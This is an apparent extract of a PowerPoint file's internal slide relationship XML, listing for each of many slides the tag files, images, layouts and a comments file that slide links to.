<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag793.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag792.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag791.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag790.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag789.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag788.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag787.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag786.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag785.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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98.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag797.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag796.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag795.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag807.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag806.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag805.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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag800.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag808.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag799.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag810.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag809.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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4.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag813.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag81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0.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag62.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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s>
</file>

<file path=ppt/slides/_rels/slide16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22.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag821.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag820.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag819.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag827.xml"/><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tags" Target="../tags/tag824.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag823.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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6.png"/><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164.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/comment1.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.png"/><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tags" Target="../tags/tag838.xml"/><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tags" Target="../tags/tag835.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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46.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag845.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag844.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag843.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag842.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag841.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag850.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag849.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag848.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag847.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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09.png"/><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tags" Target="../tags/tag853.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag852.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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tags" Target="../tags/tag860.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag859.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag858.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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68.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag867.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag866.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag865.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag864.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag863.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11.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7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1.png"/><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tags" Target="../tags/tag871.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag870.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag869.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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80.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag879.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag878.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag877.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag876.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag875.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag884.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag883.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag882.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag881.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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3.png"/><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tags" Target="../tags/tag886.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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97.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag896.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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag892.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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02.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag901.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag900.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag899.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag898.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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06.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag905.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag904.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag903.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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tags" Target="../tags/tag909.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag908.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag907.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide178.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag920.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag919.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag918.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag917.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag916.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag915.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag914.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag913.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag912.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17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tags" Target="../tags/tag924.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag923.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag922.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag921.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image" Target="../media/image13.png"/><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12.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag7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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag935.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag934.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag933.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag932.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag931.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag930.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag929.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag928.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag936.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag927.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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39.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag938.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag937.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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43.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag942.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag941.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag940.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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47.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag946.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag945.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag944.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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51.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag950.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag949.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag948.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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55.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag954.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag953.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag952.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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60.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag959.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag958.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag957.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag956.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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966.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag965.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag964.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag963.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag962.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag961.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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5.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag972.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag971.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag970.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag969.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag968.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag967.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84.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><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image" Target="../media/image14.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag80.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag79.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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78.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.png"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag973.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag984.xml"/><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tags" Target="../tags/tag981.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag980.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag979.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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90.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag989.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag988.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag987.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag986.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag985.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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95.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag994.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag993.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag992.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag991.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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9.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1001.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1000.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag999.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag998.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag997.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag996.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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0.png"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1002.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1011.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1010.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1009.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1008.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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1.png"/><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 Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1013.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1022.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1021.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1020.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1019.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide19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2.png"/><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tags" Target="../tags/tag1027.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1026.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1025.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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0.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><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0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035.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1034.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1033.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1032.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1031.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1030.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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40.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1039.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1038.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1037.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1036.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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4.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1046.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1045.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1044.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1043.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1042.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1041.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide203.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1053.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1052.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1051.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1050.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1049.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1048.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1047.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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7.png"/><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tags" Target="../tags/tag1057.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1056.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1055.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1054.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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8.png"/><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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1062.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1061.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1060.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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071.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1070.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1069.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1068.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1067.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1066.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20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76.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1075.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1074.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1073.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1072.xml"/></Relationships>
</file>

